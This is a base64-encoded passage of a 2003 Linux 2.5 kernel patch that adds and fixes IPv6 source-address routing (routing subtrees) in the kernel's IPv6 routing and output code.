LjUvaW5jbHVkZS9saW51eC9pcHY2LmgNCi0tLSBsaW51eC0yLjUuT0xEL2lu Y2x1ZGUvbGludXgvaXB2Ni5oCU1vbiBKdW4gMzAgMjA6MzY6MDAgMjAwMw0K KysrIGxpbnV4LTIuNS9pbmNsdWRlL2xpbnV4L2lwdjYuaAlGcmkgSnVsICA0 IDIzOjMyOjE0IDIwMDMNCkBAIC0xNTAsNyArMTUwLDkgQEANCiAJc3RydWN0 IGluNl9hZGRyIAlyY3Zfc2FkZHI7DQogCXN0cnVjdCBpbjZfYWRkcgkJZGFk ZHI7DQogCXN0cnVjdCBpbjZfYWRkcgkJKmRhZGRyX2NhY2hlOw0KLQ0KKyNp ZmRlZiBDT05GSUdfSVBWNl9TVUJUUkVFUw0KKwlzdHJ1Y3QgaW42X2FkZHIJ CSpzYWRkcl9jYWNoZTsNCisjZW5kaWYNCiAJX191MzIJCQlmbG93X2xhYmVs Ow0KIAlfX3UzMgkJCWZyYWdfc2l6ZTsNCiAJaW50CQkJaG9wX2xpbWl0Ow0K ZGlmZiAtTnVyIC0tZXhjbHVkZT1SQ1MgLS1leGNsdWRlPUNWUyAtLWV4Y2x1 ZGU9U0NDUyAtLWV4Y2x1ZGU9Qml0S2VlcGVyIC0tZXhjbHVkZT1DaGFuZ2VT ZXQgbGludXgtMi41Lk9MRC9pbmNsdWRlL25ldC9pcDZfcm91dGUuaCBsaW51 eC0yLjUvaW5jbHVkZS9uZXQvaXA2X3JvdXRlLmgNCi0tLSBsaW51eC0yLjUu T0xEL2luY2x1ZGUvbmV0L2lwNl9yb3V0ZS5oCU1vbiBKdW4gMzAgMjA6MzY6 MDAgMjAwMw0KKysrIGxpbnV4LTIuNS9pbmNsdWRlL25ldC9pcDZfcm91dGUu aAlGcmkgSnVsICA0IDIzOjMyOjE0IDIwMDMNCkBAIC0xMDIsNyArMTAyLDgg QEANCiAgKi8NCiANCiBzdGF0aWMgaW5saW5lIHZvaWQgaXA2X2RzdF9zdG9y ZShzdHJ1Y3Qgc29jayAqc2ssIHN0cnVjdCBkc3RfZW50cnkgKmRzdCwNCi0J CQkJICAgICBzdHJ1Y3QgaW42X2FkZHIgKmRhZGRyKQ0KKwkJCQkgc3RydWN0 IGluNl9hZGRyICpkYWRkciwNCisJCQkJIHN0cnVjdCBpbjZfYWRkciAqc2Fk ZHIpDQogew0KIAlzdHJ1Y3QgaXB2Nl9waW5mbyAqbnAgPSBpbmV0Nl9zayhz ayk7DQogCXN0cnVjdCBydDZfaW5mbyAqcnQgPSAoc3RydWN0IHJ0Nl9pbmZv ICopIGRzdDsNCkBAIC0xMTAsNiArMTExLDkgQEANCiAJd3JpdGVfbG9jaygm c2stPnNrX2RzdF9sb2NrKTsNCiAJX19za19kc3Rfc2V0KHNrLCBkc3QpOw0K IAlucC0+ZGFkZHJfY2FjaGUgPSBkYWRkcjsNCisjaWZkZWYgQ09ORklHX0lQ VjZfU1VCVFJFRVMNCisJbnAtPnNhZGRyX2NhY2hlID0gc2FkZHI7DQorI2Vu ZGlmDQogCW5wLT5kc3RfY29va2llID0gcnQtPnJ0Nmlfbm9kZSA/IHJ0LT5y dDZpX25vZGUtPmZuX3Nlcm51bSA6IDA7DQogCXdyaXRlX3VubG9jaygmc2st PnNrX2RzdF9sb2NrKTsNCiB9DQpkaWZmIC1OdXIgLS1leGNsdWRlPVJDUyAt LWV4Y2x1ZGU9Q1ZTIC0tZXhjbHVkZT1TQ0NTIC0tZXhjbHVkZT1CaXRLZWVw ZXIgLS1leGNsdWRlPUNoYW5nZVNldCBsaW51eC0yLjUuT0xEL25ldC9pcHY2 L0tjb25maWcgbGludXgtMi41L25ldC9pcHY2L0tjb25maWcNCi0tLSBsaW51 eC0yLjUuT0xEL25ldC9pcHY2L0tjb25maWcJTW9uIEp1biAzMCAyMDozNjow MyAyMDAzDQorKysgbGludXgtMi41L25ldC9pcHY2L0tjb25maWcJRnJpIEp1 bCAgNCAyMzozMjoxNCAyMDAzDQpAQCAtNjMsNCArNjMsMTIgQEANCiANCiAJ ICBJZiB1bnN1cmUsIHNheSBOLg0KIA0KK2NvbmZpZyBJUFY2X1NVQlRSRUVT DQorCWJvb2wgIklQdjY6IFNvdXJjZSBhZGRyZXNzIHJvdXRpbmciDQorCWRl cGVuZHMgb24gSVBWNg0KKwktLS1oZWxwLS0tDQorCSAgU3VwcG9ydCBmb3Ig YWR2YW5jZWQgcm91dGluZyBieSBib3RoIHNvdXJjZSBhbmQgZGVzdGluYXRp b24gYWRkcmVzcy4NCisNCisJICBJZiB1bnN1cmUsIHNheSBOLg0KKw0KIHNv dXJjZSAibmV0L2lwdjYvbmV0ZmlsdGVyL0tjb25maWciDQpkaWZmIC1OdXIg LS1leGNsdWRlPVJDUyAtLWV4Y2x1ZGU9Q1ZTIC0tZXhjbHVkZT1TQ0NTIC0t ZXhjbHVkZT1CaXRLZWVwZXIgLS1leGNsdWRlPUNoYW5nZVNldCBsaW51eC0y LjUuT0xEL25ldC9pcHY2L2lwNl9maWIuYyBsaW51eC0yLjUvbmV0L2lwdjYv aXA2X2ZpYi5jDQotLS0gbGludXgtMi41Lk9MRC9uZXQvaXB2Ni9pcDZfZmli LmMJTW9uIEp1biAzMCAyMDozNjowMyAyMDAzDQorKysgbGludXgtMi41L25l dC9pcHY2L2lwNl9maWIuYwlGcmkgSnVsICA0IDIzOjMyOjE0IDIwMDMNCkBA IC0xOCw2ICsxOCw3IEBADQogICogCVl1amkgU0VLSVlBIEBVU0FHSToJU3Vw cG9ydCBkZWZhdWx0IHJvdXRlIG9uIHJvdXRlciBub2RlOw0KICAqIAkJCQly ZW1vdmUgaXA2X251bGxfZW50cnkgZnJvbSB0aGUgdG9wIG9mDQogICogCQkJ CXJvdXRpbmcgdGFibGUuDQorICogCVZpbGxlIE51b3J2YWxhOgkJRml4ZWQg cm91dGluZyBzdWJ0cmVlcy4NCiAgKi8NCiAjaW5jbHVkZSA8bGludXgvY29u ZmlnLmg+DQogI2luY2x1ZGUgPGxpbnV4L2Vycm5vLmg+DQpAQCAtNDk2LDYg KzQ5Nyw4IEBADQogCQltb2RfdGltZXIoJmlwNl9maWJfdGltZXIsIGppZmZp ZXMgKyBpcDZfcnRfZ2NfaW50ZXJ2YWwpOw0KIH0NCiANCitzdGF0aWMgc3Ry dWN0IHJ0Nl9pbmZvICogZmliNl9maW5kX3ByZWZpeChzdHJ1Y3QgZmliNl9u b2RlICpmbik7DQorDQogLyoNCiAgKglBZGQgcm91dGluZyBpbmZvcm1hdGlv biB0byB0aGUgcm91dGluZyB0cmVlLg0KICAqCTxkZXN0aW5hdGlvbiBhZGRy Pi88c291cmNlIGFkZHI+DQpAQCAtNTA2LDYgKzUwOSw5IEBADQogew0KIAlz dHJ1Y3QgZmliNl9ub2RlICpmbjsNCiAJaW50IGVyciA9IC1FTk9NRU07DQor I2lmZGVmIENPTkZJR19JUFY2X1NVQlRSRUVTDQorCXN0cnVjdCBmaWI2X25v ZGUgKnBuID0gTlVMTDsNCisjZW5kaWYNCiANCiAJZm4gPSBmaWI2X2FkZF8x KHJvb3QsICZydC0+cnQ2aV9kc3QuYWRkciwgc2l6ZW9mKHN0cnVjdCBpbjZf YWRkciksDQogCQkJcnQtPnJ0NmlfZHN0LnBsZW4sICh1OCopICZydC0+cnQ2 aV9kc3QgLSAodTgqKSBydCk7DQpAQCAtNTU4LDEwICs1NjQsNiBAQA0KIAkJ CS8qIE5vdyBsaW5rIG5ldyBzdWJ0cmVlIHRvIG1haW4gdHJlZSAqLw0KIAkJ CXNmbi0+cGFyZW50ID0gZm47DQogCQkJZm4tPnN1YnRyZWUgPSBzZm47DQot CQkJaWYgKGZuLT5sZWFmID09IE5VTEwpIHsNCi0JCQkJZm4tPmxlYWYgPSBy dDsNCi0JCQkJYXRvbWljX2luYygmcnQtPnJ0NmlfcmVmKTsNCi0JCQl9DQog CQl9IGVsc2Ugew0KIAkJCXNuID0gZmliNl9hZGRfMShmbi0+c3VidHJlZSwg JnJ0LT5ydDZpX3NyYy5hZGRyLA0KIAkJCQkJc2l6ZW9mKHN0cnVjdCBpbjZf YWRkciksIHJ0LT5ydDZpX3NyYy5wbGVuLA0KQEAgLTU3MSw2ICs1NzMsMTMg QEANCiAJCQkJZ290byBzdF9mYWlsdXJlOw0KIAkJfQ0KIA0KKwkJLyogZmli Nl9hZGRfMSBtaWdodCBoYXZlIGNsZWFyZWQgdGhlIG9sZCBsZWFmIHBvaW50 ZXIgKi8NCisJCWlmIChmbi0+bGVhZiA9PSBOVUxMKSB7DQorCQkJZm4tPmxl YWYgPSBydDsNCisJCSAgYXRvbWljX2luYygmcnQtPnJ0NmlfcmVmKTsNCisJ CX0NCisNCisJCXBuID0gZm47DQogCQlmbiA9IHNuOw0KIAl9DQogI2VuZGlm DQpAQCAtNTg0LDggKzU5MywyNCBAQA0KIAl9DQogDQogb3V0Og0KLQlpZiAo ZXJyKQ0KKwlpZiAoZXJyKSB7DQorI2lmZGVmIENPTkZJR19JUFY2X1NVQlRS RUVTDQorCQkvKiBJZiBmaWI2X2FkZF8xIGhhcyBjbGVhcmVkIHRoZSBvbGQg bGVhZiBwb2ludGVyIGluIHRoZSANCisJCSAgIHN1cGVyLXRyZWUgbGVhZiBu b2RlIHdlIGhhdmUgdG8gZmluZCBhIG5ldyBvbmUgZm9yIGl0LiAqLw0KKwkJ DQorCQlpZiAocG4gJiYgIShwbi0+Zm5fZmxhZ3MgJiBSVE5fUlRJTkZPKSkg ew0KKwkJCXBuLT5sZWFmID0gZmliNl9maW5kX3ByZWZpeChwbik7DQorI2lm IFJUNl9ERUJVRyA+PSAyDQorCQkJaWYgKCFwbi0+bGVhZikgew0KKwkJCQlC VUdfVFJBUChwbi0+bGVhZik7DQorCQkJCXBuLT5sZWFmID0gJmlwNl9udWxs X2VudHJ5Ow0KKwkJCX0NCisjZW5kaWYNCisJCQlhdG9taWNfaW5jKCZwbi0+ bGVhZi0+cnQ2aV9yZWYpOw0KKwkJfQ0KKyNlbmRpZg0KIAkJZHN0X2ZyZWUo JnJ0LT51LmRzdCk7DQorCX0NCiAJcmV0dXJuIGVycjsNCiANCiAjaWZkZWYg Q09ORklHX0lQVjZfU1VCVFJFRVMNCkBAIC02MzcsMzIgKzY2MiwzMSBAQA0K IAkJYnJlYWs7DQogCX0NCiANCi0Jd2hpbGUgKChmbi0+Zm5fZmxhZ3MgJiBS VE5fUk9PVCkgPT0gMCkgew0KKwlmb3IgKDs7KSB7DQorCQlpZiAoU1VCVFJF RShmbikgfHwgZm4tPmZuX2ZsYWdzICYgUlROX1JUSU5GTykgew0KKwkJCXN0 cnVjdCBydDZrZXkgKmtleTsNCisJCQlrZXkgPSAoc3RydWN0IHJ0NmtleSAq KSAoKHU4ICopIGZuLT5sZWFmICsgYXJncy0+b2Zmc2V0KTsNCisJCQkNCisJ CQlpZiAoYWRkcl9tYXRjaCgma2V5LT5hZGRyLCBhcmdzLT5hZGRyLCBrZXkt PnBsZW4pKSB7DQogI2lmZGVmIENPTkZJR19JUFY2X1NVQlRSRUVTDQotCQlp ZiAoZm4tPnN1YnRyZWUpIHsNCi0JCQlzdHJ1Y3QgZmliNl9ub2RlICpzdDsN Ci0JCQlzdHJ1Y3QgbG9va3VwX2FyZ3MgKm5hcmc7DQotDQotCQkJbmFyZyA9 IGFyZ3MgKyAxOw0KLQ0KLQkJCWlmIChuYXJnLT5hZGRyKSB7DQotCQkJCXN0 ID0gZmliNl9sb29rdXBfMShmbi0+c3VidHJlZSwgbmFyZyk7DQotDQotCQkJ CWlmIChzdCAmJiAhKHN0LT5mbl9mbGFncyAmIFJUTl9ST09UKSkNCi0JCQkJ CXJldHVybiBzdDsNCi0JCQl9DQotCQl9DQorCQkJCWlmIChmbi0+c3VidHJl ZSkgew0KKwkJCQkJc3RydWN0IGxvb2t1cF9hcmdzICpuYXJnID0gYXJncyAr IDE7DQorCQkJCQkNCisJCQkJCWlmIChuYXJnLT5hZGRyKSB7DQorCQkJCQkJ c3RydWN0IGZpYjZfbm9kZSAqc3Q7DQorCQkJCQkJc3QgPSBmaWI2X2xvb2t1 cF8xKGZuLT5zdWJ0cmVlLCBuYXJnKTsNCisJCQkJCQkNCisJCQkJCQlpZiAo c3QpDQorCQkJCQkJCXJldHVybiBzdDsNCisJCQkJCX0NCisJCQkJfQ0KICNl bmRpZg0KLQ0KLQkJaWYgKGZuLT5mbl9mbGFncyAmIFJUTl9SVElORk8pIHsN Ci0JCQlzdHJ1Y3QgcnQ2a2V5ICprZXk7DQotDQotCQkJa2V5ID0gKHN0cnVj dCBydDZrZXkgKikgKCh1OCAqKSBmbi0+bGVhZiArDQotCQkJCQkJIGFyZ3Mt Pm9mZnNldCk7DQotDQotCQkJaWYgKGFkZHJfbWF0Y2goJmtleS0+YWRkciwg YXJncy0+YWRkciwga2V5LT5wbGVuKSkNCi0JCQkJcmV0dXJuIGZuOw0KKwkJ CQlpZiAoZm4tPmZuX2ZsYWdzICYgUlROX1JUSU5GTykNCisJCQkJCXJldHVy biBmbjsNCisJCQl9DQogCQl9DQorCQlpZiAoZm4tPmZuX2ZsYWdzICYgUlRO X1JPT1QpDQorCQkJYnJlYWs7DQogDQogCQlmbiA9IGZuLT5wYXJlbnQ7DQog CX0NCkBAIC03NDEsMTIgKzc2NSwxMiBAQA0KIA0KICNpZmRlZiBDT05GSUdf SVBWNl9TVUJUUkVFUw0KIAlpZiAoc3JjX2xlbikgew0KLQkJQlVHX1RSQVAo c2FkZHIhPU5VTEwpOw0KLQkJaWYgKGZuID09IE5VTEwpDQotCQkJZm4gPSBm bi0+c3VidHJlZTsNCi0JCWlmIChmbikNCi0JCQlmbiA9IGZpYjZfbG9jYXRl XzEoZm4sIHNhZGRyLCBzcmNfbGVuLA0KKwkJQlVHX1RSQVAoc2FkZHIgIT0g TlVMTCk7DQorCQlpZiAoZm4gJiYgZm4tPnN1YnRyZWUpDQorCQkJZm4gPSBm aWI2X2xvY2F0ZV8xKGZuLT5zdWJ0cmVlLCBzYWRkciwgc3JjX2xlbiwNCiAJ CQkJCSAgICh1OCopICZydC0+cnQ2aV9zcmMgLSAodTgqKSBydCk7DQorCQll bHNlDQorCQkJcmV0dXJuIE5VTEw7DQogCX0NCiAjZW5kaWYNCiANCmRpZmYg LU51ciAtLWV4Y2x1ZGU9UkNTIC0tZXhjbHVkZT1DVlMgLS1leGNsdWRlPVND Q1MgLS1leGNsdWRlPUJpdEtlZXBlciAtLWV4Y2x1ZGU9Q2hhbmdlU2V0IGxp bnV4LTIuNS5PTEQvbmV0L2lwdjYvaXA2X291dHB1dC5jIGxpbnV4LTIuNS9u ZXQvaXB2Ni9pcDZfb3V0cHV0LmMNCi0tLSBsaW51eC0yLjUuT0xEL25ldC9p cHY2L2lwNl9vdXRwdXQuYwlXZWQgSnVsICAyIDE1OjQyOjAzIDIwMDMNCisr KyBsaW51eC0yLjUvbmV0L2lwdjYvaXA2X291dHB1dC5jCUZyaSBKdWwgIDQg MjM6MzI6MTQgMjAwMw0KQEAgLTUzMSw2ICs1MzEsNyBAQA0KIAlzdHJ1Y3Qg aXB2Nl9waW5mbyAqbnAgPSBpbmV0Nl9zayhzayk7DQogCXN0cnVjdCBpbjZf YWRkciBmaW5hbF9kc3RfYnVmLCAqZmluYWxfZHN0ID0gTlVMTDsNCiAJc3Ry dWN0IGRzdF9lbnRyeSAqZHN0Ow0KKwlzdHJ1Y3QgcnQ2X2luZm8gKnJ0Ow0K IAlpbnQgZXJyID0gMDsNCiAJdW5zaWduZWQgaW50IHBrdGxlbmd0aCwganVt Ym9sZW4sIG10dTsNCiANCkBAIC01NDYsMTEgKzU0NywxMSBAQA0KIA0KIAlk c3QgPSBfX3NrX2RzdF9jaGVjayhzaywgbnAtPmRzdF9jb29raWUpOw0KIAlp ZiAoZHN0KSB7DQotCQlzdHJ1Y3QgcnQ2X2luZm8gKnJ0ID0gKHN0cnVjdCBy dDZfaW5mbyopZHN0Ow0KKwkJcnQgPSAoc3RydWN0IHJ0Nl9pbmZvKilkc3Q7 DQogDQogCQkJLyogWWVzLCBjaGVja2luZyByb3V0ZSB2YWxpZGl0eSBpbiBu b3QgY29ubmVjdGVkDQogCQkJICAgY2FzZSBpcyBub3QgdmVyeSBzaW1wbGUu IFRha2UgaW50byBhY2NvdW50LA0KLQkJCSAgIHRoYXQgd2UgZG8gbm90IHN1 cHBvcnQgcm91dGluZyBieSBzb3VyY2UsIFRPUywNCisJCQkgICB0aGF0IHdl IGRvIG5vdCBzdXBwb3J0IHJvdXRpbmcgYnkgVE9TLA0KIAkJCSAgIGFuZCBN U0dfRE9OVFJPVVRFIAkJLS1BTksgKDk4MDcyNikNCiANCiAJCQkgICAxLiBJ ZiByb3V0ZSB3YXMgaG9zdCByb3V0ZSwgY2hlY2sgdGhhdA0KQEAgLTU3MCw2 ICs1NzEsMTMgQEANCiAJCSAgICAgIGlwdjZfYWRkcl9jbXAoJmZsLT5mbDZf ZHN0LCAmcnQtPnJ0NmlfZHN0LmFkZHIpKQ0KIAkJICAgICAmJiAobnAtPmRh ZGRyX2NhY2hlID09IE5VTEwgfHwNCiAJCQkgaXB2Nl9hZGRyX2NtcCgmZmwt PmZsNl9kc3QsIG5wLT5kYWRkcl9jYWNoZSkpKQ0KKyNpZmRlZiBDT05GSUdf SVBWNl9TVUJUUkVFUw0KKwkJICAgIHx8ICghaXB2Nl9hZGRyX2FueSgmZmwt PmZsNl9zcmMpDQorCQkJJiYgKHJ0LT5ydDZpX3NyYy5wbGVuICE9IDEyOCB8 fA0KKwkJCSAgICBpcHY2X2FkZHJfY21wKCZmbC0+Zmw2X3NyYywgJnJ0LT5y dDZpX3NyYy5hZGRyKSkNCisJCQkmJiAobnAtPnNhZGRyX2NhY2hlID09IE5V TEwgfHwNCisJCQkgICAgaXB2Nl9hZGRyX2NtcCgmZmwtPmZsNl9zcmMsIG5w LT5zYWRkcl9jYWNoZSkpKQ0KKyNlbmRpZg0KIAkJICAgIHx8IChmbC0+b2lm ICYmIGZsLT5vaWYgIT0gZHN0LT5kZXYtPmlmaW5kZXgpKSB7DQogCQkJZHN0 ID0gTlVMTDsNCiAJCX0gZWxzZQ0KQEAgLTU5Niw2ICs2MDQsMjAgQEANCiAJ CQlnb3RvIG91dDsNCiAJCX0NCiAJfQ0KKyNpZmRlZiBDT05GSUdfSVBWNl9T VUJUUkVFUw0KKwlydCA9IChzdHJ1Y3QgcnQ2X2luZm8qKWRzdDsNCisJaWYg KGlwdjZfYWRkcl9jbXAoJmZsLT5mbDZfc3JjLCAmbnAtPnNhZGRyKSAmJiAN CisJICAgIChydC0+cnQ2aV9zcmMucGxlbiAhPSAxMjggfHwgDQorCSAgICAg aXB2Nl9hZGRyX2NtcCgmZmwtPmZsNl9zcmMsICZydC0+cnQ2aV9zcmMuYWRk cikpKSB7DQorCQlkc3RfcmVsZWFzZShkc3QpOw0KKwkJZHN0ID0gaXA2X3Jv dXRlX291dHB1dChzaywgZmwpOw0KKwkJaWYgKGRzdC0+ZXJyb3IpIHsNCisJ CQlJUDZfSU5DX1NUQVRTKElwNk91dE5vUm91dGVzKTsNCisJCQlkc3RfcmVs ZWFzZShkc3QpOw0KKwkJCXJldHVybiAtRU5FVFVOUkVBQ0g7DQorCQl9DQor CX0NCisjZW5kaWYNCiAJcGt0bGVuZ3RoID0gbGVuZ3RoOw0KIA0KICAgICAg ICAgaWYgKGRzdCkgew0KQEAgLTcxOSw3ICs3NDEsOSBAQA0KIG91dDoNCiAJ aXA2X2RzdF9zdG9yZShzaywgZHN0LA0KIAkJICAgICAgIWlwdjZfYWRkcl9j bXAoJmZsLT5mbDZfZHN0LCAmbnAtPmRhZGRyKSA/DQotCQkgICAgICAmbnAt PmRhZGRyIDogTlVMTCk7DQorCQkgICAgICAmbnAtPmRhZGRyIDogTlVMTCwN CisJCSAgICAgICFpcHY2X2FkZHJfY21wKCZmbC0+Zmw2X3NyYywgJm5wLT5z YWRkcikgPw0KKwkJICAgICAgJm5wLT5zYWRkciA6IE5VTEwpOw0KIAlpZiAo ZXJyID4gMCkNCiAJCWVyciA9IG5wLT5yZWN2ZXJyID8gbmV0X3htaXRfZXJy bm8oZXJyKSA6IDA7DQogCXJldHVybiBlcnI7DQpAQCAtMTE0NCwxNSArMTE2 OCwxNiBAQA0KIGludCBpcDZfZHN0X2xvb2t1cChzdHJ1Y3Qgc29jayAqc2ss IHN0cnVjdCBkc3RfZW50cnkgKipkc3QsIHN0cnVjdCBmbG93aSAqZmwpDQog ew0KIAlzdHJ1Y3QgaXB2Nl9waW5mbyAqbnAgPSBpbmV0Nl9zayhzayk7DQor CXN0cnVjdCBydDZfaW5mbyAqcnQ7DQogCWludCBlcnIgPSAwOw0KIA0KIAkq ZHN0ID0gX19za19kc3RfY2hlY2soc2ssIG5wLT5kc3RfY29va2llKTsNCiAJ aWYgKCpkc3QpIHsNCi0JCXN0cnVjdCBydDZfaW5mbyAqcnQgPSAoc3RydWN0 IHJ0Nl9pbmZvKikqZHN0Ow0KKwkJcnQgPSAoc3RydWN0IHJ0Nl9pbmZvKikq ZHN0Ow0KIA0KIAkJCS8qIFllcywgY2hlY2tpbmcgcm91dGUgdmFsaWRpdHkg aW4gbm90IGNvbm5lY3RlZA0KIAkJCSAgIGNhc2UgaXMgbm90IHZlcnkgc2lt cGxlLiBUYWtlIGludG8gYWNjb3VudCwNCi0JCQkgICB0aGF0IHdlIGRvIG5v dCBzdXBwb3J0IHJvdXRpbmcgYnkgc291cmNlLCBUT1MsDQorCQkJICAgdGhh dCB3ZSBkbyBub3Qgc3VwcG9ydCByb3V0aW5nIGJ5IFRPUywNCiAJCQkgICBh bmQgTVNHX0RPTlRST1VURSAJCS0tQU5LICg5ODA3MjYpDQogDQogCQkJICAg MS4gSWYgcm91dGUgd2FzIGhvc3Qgcm91dGUsIGNoZWNrIHRoYXQNCkBAIC0x MTcyLDYgKzExOTcsMTMgQEANCiAJCSAgICAgIGlwdjZfYWRkcl9jbXAoJmZs LT5mbDZfZHN0LCAmcnQtPnJ0NmlfZHN0LmFkZHIpKQ0KIAkJICAgICAmJiAo bnAtPmRhZGRyX2NhY2hlID09IE5VTEwgfHwNCiAJCQkgaXB2Nl9hZGRyX2Nt cCgmZmwtPmZsNl9kc3QsIG5wLT5kYWRkcl9jYWNoZSkpKQ0KKyNpZmRlZiBD T05GSUdfSVBWNl9TVUJUUkVFUw0KKwkJICAgIHx8ICghaXB2Nl9hZGRyX2Fu eSgmZmwtPmZsNl9zcmMpDQorCQkJJiYgKHJ0LT5ydDZpX3NyYy5wbGVuICE9 IDEyOCB8fA0KKwkJCSAgICBpcHY2X2FkZHJfY21wKCZmbC0+Zmw2X3NyYywg JnJ0LT5ydDZpX3NyYy5hZGRyKSkNCisJCQkmJiAobnAtPnNhZGRyX2NhY2hl ID09IE5VTEwgfHwNCisJCQkgICAgaXB2Nl9hZGRyX2NtcCgmZmwtPmZsNl9z cmMsIG5wLT5zYWRkcl9jYWNoZSkpKQ0KKyNlbmRpZg0KIAkJICAgIHx8IChm bC0+b2lmICYmIGZsLT5vaWYgIT0gKCpkc3QpLT5kZXYtPmlmaW5kZXgpKSB7 DQogCQkJKmRzdCA9IE5VTEw7DQogCQl9IGVsc2UNCkBAIC0xMTk4LDcgKzEy MzAsMjAgQEANCiAJCQlyZXR1cm4gZXJyOw0KIAkJfQ0KIAl9DQotDQorI2lm ZGVmIENPTkZJR19JUFY2X1NVQlRSRUVTDQorCXJ0ID0gKHN0cnVjdCBydDZf aW5mbyopKmRzdDsNCisJaWYgKGlwdjZfYWRkcl9jbXAoJmZsLT5mbDZfc3Jj LCAmbnAtPnNhZGRyKSAmJiANCisJICAgIChydC0+cnQ2aV9zcmMucGxlbiAh PSAxMjggfHwgDQorCSAgICAgaXB2Nl9hZGRyX2NtcCgmZmwtPmZsNl9zcmMs ICZydC0+cnQ2aV9zcmMuYWRkcikpKSB7DQorCQlkc3RfcmVsZWFzZSgqZHN0 KTsNCisJCSpkc3QgPSBpcDZfcm91dGVfb3V0cHV0KHNrLCBmbCk7DQorCQlp ZiAoKCpkc3QpLT5lcnJvcikgew0KKwkJCUlQNl9JTkNfU1RBVFMoSXA2T3V0 Tm9Sb3V0ZXMpOw0KKwkJCWRzdF9yZWxlYXNlKCpkc3QpOw0KKwkJCXJldHVy biAtRU5FVFVOUkVBQ0g7DQorCQl9DQorCX0NCisjZW5kaWYNCiAgICAgICAg IGlmICgqZHN0KSB7DQogCQlpZiAoKGVyciA9IHhmcm1fbG9va3VwKGRzdCwg ZmwsIHNrLCAwKSkgPCAwKSB7DQogCQkJZHN0X3JlbGVhc2UoKmRzdCk7CQ0K ZGlmZiAtTnVyIC0tZXhjbHVkZT1SQ1MgLS1leGNsdWRlPUNWUyAtLWV4Y2x1 ZGU9U0NDUyAtLWV4Y2x1ZGU9Qml0S2VlcGVyIC0tZXhjbHVkZT1DaGFuZ2VT ZXQgbGludXgtMi41Lk9MRC9uZXQvaXB2Ni9pcDZfdHVubmVsLmMgbGludXgt Mi41L25ldC9pcHY2L2lwNl90dW5uZWwuYw0KLS0tIGxpbnV4LTIuNS5PTEQv bmV0L2lwdjYvaXA2X3R1bm5lbC5jCUZyaSBKdWwgIDQgMTQ6NDg6MjEgMjAw Mw0KKysrIGxpbnV4LTIuNS9uZXQvaXB2Ni9pcDZfdHVubmVsLmMJRnJpIEp1 bCAgNCAyMzozMjozNCAyMDAzDQpAQCAtNzU3LDYgKzc1NywxMCBAQA0KIAlp ZiAoZHN0KSB7DQogCQlpZiAobnAtPmRhZGRyX2NhY2hlID09IE5VTEwgfHwN CiAJCSAgICBpcHY2X2FkZHJfY21wKCZmbC5mbDZfZHN0LCBucC0+ZGFkZHJf Y2FjaGUpIHx8DQorI2lmZGVmIENPTkZJR19JUFY2X1NVQlRSRUVTDQorCQkg ICAgbnAtPnNhZGRyX2NhY2hlID09IE5VTEwgfHwNCisJCSAgICBpcHY2X2Fk ZHJfY21wKCZmbC5mbDZfc3JjLCBucC0+c2FkZHJfY2FjaGUpIHx8DQorI2Vu ZGlmDQogCQkgICAgKGZsLm9pZiAmJiBmbC5vaWYgIT0gZHN0LT5kZXYtPmlm aW5kZXgpKSB7DQogCQkJZHN0ID0gTlVMTDsNCiAJCX0NCkBAIC04MTYsNyAr ODIwLDcgQEANCiAJCXNvY2tfa2ZyZWVfcyhzaywgb3B0LCBvcHQtPnRvdF9s ZW4pOw0KIA0KIAlmbDZfc29ja19yZWxlYXNlKGZsX2xibCk7DQotCWlwNl9k c3Rfc3RvcmUoc2ssIGRzdCwgJm5wLT5kYWRkcik7DQorCWlwNl9kc3Rfc3Rv cmUoc2ssIGRzdCwgJm5wLT5kYWRkciwgJm5wLT5zYWRkcik7DQogCWlwNl94 bWl0X3VubG9jaygpOw0KIAlrZnJlZV9za2Ioc2tiKTsNCiAJdC0+cmVjdXJz aW9uLS07DQpkaWZmIC1OdXIgLS1leGNsdWRlPVJDUyAtLWV4Y2x1ZGU9Q1ZT IC0tZXhjbHVkZT1TQ0NTIC0tZXhjbHVkZT1CaXRLZWVwZXIgLS1leGNsdWRl PUNoYW5nZVNldCBsaW51eC0yLjUuT0xEL25ldC9pcHY2L3Jhdy5jIGxpbnV4 LTIuNS9uZXQvaXB2Ni9yYXcuYw0KLS0tIGxpbnV4LTIuNS5PTEQvbmV0L2lw djYvcmF3LmMJV2VkIEp1bCAgMiAxNTo0MjowMyAyMDAzDQorKysgbGludXgt Mi41L25ldC9pcHY2L3Jhdy5jCUZyaSBKdWwgIDQgMjM6MzI6MzQgMjAwMw0K QEAgLTY5NCw3ICs2OTQsOSBAQA0KIGRvbmU6DQogCWlwNl9kc3Rfc3RvcmUo c2ssIGRzdCwNCiAJCSAgICAgICFpcHY2X2FkZHJfY21wKCZmbC5mbDZfZHN0 LCAmbnAtPmRhZGRyKSA/DQotCQkgICAgICAmbnAtPmRhZGRyIDogTlVMTCk7 DQorCQkgICAgICAmbnAtPmRhZGRyIDogTlVMTCwNCisJCSAgICAgICFpcHY2 X2FkZHJfY21wKCZmbC5mbDZfc3JjLCAmbnAtPnNhZGRyKSA/DQorCQkgICAg ICAmbnAtPnNhZGRyIDogTlVMTCk7DQogCWlmIChlcnIgPiAwKQ0KIAkJZXJy ID0gbnAtPnJlY3ZlcnIgPyBuZXRfeG1pdF9lcnJubyhlcnIpIDogMDsNCiAN CmRpZmYgLU51ciAtLWV4Y2x1ZGU9UkNTIC0tZXhjbHVkZT1DVlMgLS1leGNs dWRlPVNDQ1MgLS1leGNsdWRlPUJpdEtlZXBlciAtLWV4Y2x1ZGU9Q2hhbmdl U2V0IGxpbnV4LTIuNS5PTEQvbmV0L2lwdjYvcm91dGUuYyBsaW51eC0yLjUv bmV0L2lwdjYvcm91dGUuYw0KLS0tIGxpbnV4LTIuNS5PTEQvbmV0L2lwdjYv cm91dGUuYwlNb24gSnVuIDMwIDIwOjM2OjAzIDIwMDMNCisrKyBsaW51eC0y LjUvbmV0L2lwdjYvcm91dGUuYwlTYXQgSnVsICA1IDAwOjIzOjQ0IDIwMDMN CkBAIC0zNjMsMTIgKzM2Myw4IEBADQogCQlydC0+dS5kc3QuZmxhZ3MgfD0g RFNUX0hPU1Q7DQogDQogI2lmZGVmIENPTkZJR19JUFY2X1NVQlRSRUVTDQot CQlpZiAocnQtPnJ0Nmlfc3JjLnBsZW4gJiYgc2FkZHIpIHsNCi0JCQlpcHY2 X2FkZHJfY29weSgmcnQtPnJ0Nmlfc3JjLmFkZHIsIHNhZGRyKTsNCi0JCQly dC0+cnQ2aV9zcmMucGxlbiA9IDEyODsNCi0JCX0NCisJCXJ0LT5ydDZpX3Ny 